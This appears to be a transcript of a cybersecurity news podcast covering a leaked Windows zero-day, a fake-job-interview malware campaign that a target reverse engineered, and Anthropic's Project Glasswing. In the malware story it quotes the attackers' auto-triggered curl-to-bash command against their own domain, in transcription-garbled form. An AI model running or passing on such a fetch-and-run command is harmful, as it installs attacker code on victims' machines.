Welcome to Poddy, April 7th, 2026.
Three stories catching my attention today. A leaked Windows Zero-Day exploit called BlueHammer. Someone who got targeted by fake job interview malware and completely reverse engineered it. And Anthropic launching something called Project Glasswing to secure AI systems. So first up, there's a headline making rounds about a disgruntled researcher leaking something called the BlueHammer Windows Zero-Day exploit. Now I'm seeing this as just headline level reporting right now, but what stands out to me is the specificity of that name, BlueHammer. That's not some generic vulnerability disclosure. When someone gives an exploit a branded name like that, it usually means they've put serious work into weaponizing it. My read is this sounds like someone who had access to a genuine zero-day and decided to burn bridges by making it public. The concerning part here is the motivation, a disgruntled researcher. That suggests this wasn't a responsible disclosure or even a typical leak for attention. This feels more like someone with legitimate access who got angry and decided to cause maximum damage on their way out. 0 days are incredibly valuable, both to legitimate security researchers and to bad actors. When someone with insider knowledge goes rogue like this, they're essentially handing over a skeleton key to Windows systems. I'd want to see Microsoft's response timeline on this one, because if BlueHammer's real and functional, every Windows admin should be watching for emergency patches. But here's a more detailed story that's actually fascinating from a technical perspective. Someone posted about getting targeted by a fake job interview malware attack, but instead of falling for it, they completely reverse engineered the whole thing. So here's how it worked. They got contacted by someone called Felix from a company called HyperHives through WellFound. The attackers had done their homework. They'd actually read this person's CV, knew their tech stack, and scheduled what looked like a legitimate interview slot. Then comes the hook. They asked the target to review the product before the call. Classic social engineering, right? You visit their site and it automatically triggers this command, curl s https://a's macos/hyperhives.net sestin bash. That's basically telling your Mac to download and run a script from their server in the back. Fortunately, this person was smart enough to not enter their password and killed the process immediately. But then, and this is where it gets really interesting, they spent several hours taking the malware apart piece by piece. The technical sophistication here is wild. The malware had encrypted every single configuration string using 570 unique custom functions. Think about that for a second. That's not some script kiddie operation. That's serious obfuscation work designed to make reverse engineering incredibly difficult. But this researcher used something called Unicorn to emulate all 570 of those functions and crack it open anyway. My take is this shows two things. First, the fake job interview attack vector is getting really sophisticated. And second, there are still people out there with the skills to completely dismantle these attacks when they encounter them. What I love about this story is it's a perfect example of turning the tables on attackers. Instead of becoming a victim, this person essentially did free threat intelligence work for the entire security community. They've now documented exactly how this attack works, which means defenders can build signatures and detection rules for it. That's the kind of response that makes attackers' lives harder, when their carefully crafted malware gets completely exposed and analyzed within hours of deployment. Now, shifting gears to something completely different, Anthropic has announced something called Project Glasswing, which they're positioning as an initiative to secure critical software for the AI era. This is tied to their release of Claude Mythos Preview, which apparently has enhanced cybersecurity capabilities. What's interesting here is the timing. We're seeing AI companies starting to think seriously about the security implications of their own technology, not just the capabilities. My read on Project Glasswing is that Anthropic is trying to get ahead of the inevitable problems that come when AI systems become critical infrastructure. Think about it. If AI models are going to be making decisions about power grids, financial systems, or medical devices, then securing those models becomes a national security issue. The fact that they're calling it Glasswing suggests transparency is part of the approach, which makes sense. You can't secure what you can't see or understand. I think this is actually a smart move. Better to start building security frameworks now before AI systems become too embedded in critical infrastructure to retrofit safely. So to wrap up, we've got a potentially serious Windows 0 Day leak from an insider threat. A brilliant example of how to respond to sophisticated social engineering attacks, and a major AI company starting to think seriously about securing their technology before it becomes critical infrastructure. The common thread here is that security is increasingly about human factors, disgruntled insiders, social engineering tactics, and proactive organizational thinking. The technical defenses are only as strong as the people and processes behind them. That's your cybersecurity briefing for today. Stay paranoid out there.